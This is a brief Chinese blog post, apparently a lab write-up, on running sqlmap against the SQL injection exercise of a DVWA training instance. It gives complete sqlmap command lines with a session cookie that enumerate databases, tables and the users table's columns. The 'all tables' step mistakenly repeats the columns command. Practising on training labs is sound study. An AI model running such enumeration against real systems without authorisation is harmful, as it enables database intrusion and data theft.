0%

使用sqlmap测试dvwa的sql注入漏洞

前言

使用dvwa环境练习一下sql注入。

sqlmap使用

参考教程
输入测试数据,获取到http请求的url:http://47.57.91.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
imagebec1f4185999143e.png
sqlmap时,需要带上cookie参数:
image2a91462baac0dc33.png

  • 查看所有的数据库名称
    1
    python sqlmap.py -u "http://47.57.91.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch --dbs
    imagec2849ca6bdbf55af.png
  • 查看dvwa的所有表
    1
    python sqlmap.py -u "http://47.57.91.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch -D dvwa -T users --columns
    image96a5d6d7105baf1f.png
  • 查看user表的列数据
    1
    python sqlmap.py -u "http://47.57.91.142/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch -D dvwa -T users --columns
    image61666d2bedf171ed.png
-------------本文结束感谢您的阅读-------------